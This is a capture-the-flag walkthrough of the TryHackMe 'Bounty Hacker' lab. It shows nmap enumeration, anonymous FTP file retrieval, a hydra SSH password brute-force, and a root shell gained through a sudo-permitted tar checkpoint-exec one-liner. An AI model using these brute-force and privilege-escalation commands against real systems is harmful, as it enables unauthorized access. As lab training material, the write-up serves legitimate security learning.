Initial Enumeration and User Shell:

As usual, I started with a nmap scan to look for open ports and running services.

[email protected]:~/Documents/thm/bountyHacker$ nmap -sC -sV -oN nmap/initial 10.10.0.33
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-25 18:14 IST
Nmap scan report for 10.10.0.33
Host is up (0.44s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.25.235
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.33 seconds

We have FTP running on port 21, SSH on port 22 and Apache Web Server on port 80. FTP has anonymous login allowed, so I enumerated it first. Type the username as anonymous and leave the password field as empty.

[email protected]:~/Documents/thm/bountyHacker$ ftp 10.10.0.33                                                                               [26/36]
Connected to 10.10.0.33.                                                                                                                       
220 (vsFTPd 3.0.3)                                                                                                                             
Name (10.10.0.33:madhav): anonymous                                                                                                            
230 Login successful.                                                                                                                          
Remote system type is UNIX.                                                                                                                    
Using binary mode to transfer files.                                                                                                           
ftp> ls                                                                                                                                        
200 PORT command successful. Consider using PASV.                                                                                              
150 Here comes the directory listing.                                                                                                          
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt                                                                              
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt                                                                               
226 Directory send OK.                                                                                                                         
ftp> get locks.txt                                                                                                                             
local: locks.txt remote: locks.txt                                                                                                             
200 PORT command successful. Consider using PASV.                                                                                              
150 Opening BINARY mode data connection for locks.txt (418 bytes).                                                                             
226 Transfer complete.                                                                                                                         
418 bytes received in 0.06 secs (6.9983 kB/s)                                                                                                  
ftp> get task.txt                                                                                                                              
local: task.txt remote: task.txt                                                                                                               
200 PORT command successful. Consider using PASV.                                                                                              
150 Opening BINARY mode data connection for task.txt (68 bytes).                                                                               
226 Transfer complete.                                                                                                                         
68 bytes received in 0.00 secs (592.9130 kB/s)                                                                                                 
ftp> exit                                                                                                                                      
221 Goodbye.

There are two text files named locks.txt and task.txt. I downloaded both of them on my local machine. The locks.txt is a wordlist and we can get the username from task.txt.

[email protected]:~/Documents/thm/bountyHacker$ cat task.txt 
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

Now that we have a username lin and a wordlist, we can try to crack the SSH login password using hydra.

[email protected]:~/Documents/thm/bountyHacker$ hydra -l lin -P locks.txt 10.10.0.33 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-25 18:18:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.0.33:22/
[22][ssh] host: 10.10.0.33   login: lin   password: **************
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-25 18:18:47

Hurray, we found the password, now we can login into the system via SSH and read our first flag.

[email protected]:~/Documents/thm/bountyHacker$ ssh [email protected]
The authenticity of host '10.10.0.33 (10.10.0.33)' can't be established.
ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.0.33' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

83 packages can be updated.
0 updates are security updates.

Last login: Sun Jun  7 22:23:41 2020 from 192.168.0.14
[email protected]:~/Desktop$ ls
user.txt
[email protected]:~/Desktop$ wc -c user.txt 
21 user.txt

Root Shell

Gaining a root shell on this box was easy, by using the sudo -l command, I found that the user lin can execute /bin/tar as user root.

[email protected]:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

After searching on GTFO Bins, I found that we can get a root shell by running the following command:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Once we get the root shell, we can read our final flag present in the /root directory.

[email protected]:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:~/Desktop# cd /root
[email protected]:/root# wc -c root.txt 
19 root.txt

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Yegor Meteor.